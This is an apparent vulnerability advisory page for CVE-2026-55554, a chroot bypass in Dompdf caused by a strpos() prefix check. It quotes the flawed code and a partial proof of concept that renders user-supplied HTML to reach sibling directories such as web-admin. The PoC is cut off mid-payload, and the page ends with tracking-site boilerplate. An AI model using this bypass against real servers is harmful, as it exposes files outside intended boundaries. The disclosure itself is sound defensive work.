CVE-2026-55554
Summary
The chroot check for local files uses a prefix string check to enforce chroot boundaries. The simple string comparison it performs allows paths like /var/www/root_secret/file.html when chroot is /var/www/root.
This allows attacker-controlled document paths/resources to bypass intended local file restrictions.
Details
The validateLocalUri() method is used to check if a local file is within an allowed chroot directory. After normalization with realpath(), this check is performed with a strpos() comparison:
public function validateLocalUri(string $uri)
{
...
$realfile = realpath(str_replace("file://", "", $uri));
...
foreach ($dirs as $chrootPath) {
$chrootPath = realpath($chrootPath);
if ($chrootPath !== false && strpos($realfile, $chrootPath) === 0) {
$chrootValid = true;
Due to the normalization, the $chrootPath string does not have a terminating directory separator (/) appended. Because of this, the strpos() check only validates that $chrootPath is a _prefix_ of $realfile. This allows access to folders with similar names that fall outside of the defined chroot restrictions.
For example, a chroot setting of /var/www/ would be normalized to /var/www, removing the trailing /. During strpos(), a $chrootPath of /var/www will also match a $realfile starting with /var/www2, /var/www-admin, or /var/www_backup, despite these being different directories.
PoC
With a directory structure similar to:
/home/dompdf/
|--> web/
|--> pdf.php
|--> cat0.jpg
|--> web-admin/
|--> cat1.jpg
And web-accessible Dompdf functionality similar to the following (poc.html):
<?php
require 'vendor/autoload.php';
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->setChroot(['/home/dompdf/web/']);
$dompdf = new Dompdf($options);
$dompdf->loadHtml($_POST['html']);
$dompdf->render();
$dompdf->stream();
?>
A malicious actor can exploit the vulnerability with the following script:
$html = <<<HTML
<!DOCTYPE html>
<html>
<body>
<p>within chroot</p>
<img src="/ho
⚡ Watch CVE-2026-55554
Get an email if CVE-2026-55554 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.28% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 20% of all EPSS-scored CVEs.
Advisory coverage (2)
- unknownCVE-2026-55554: Dompdf is an HTML to PDF converter for PHP. In versions 3.15 and prior, the validateLocalUri()…nvd · 2026-07-28
- lowGHSA-wvh6-f5jh-8gw4: Dompdf: Chroot Validation Bypassghsa · 2026-07-22
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-55554)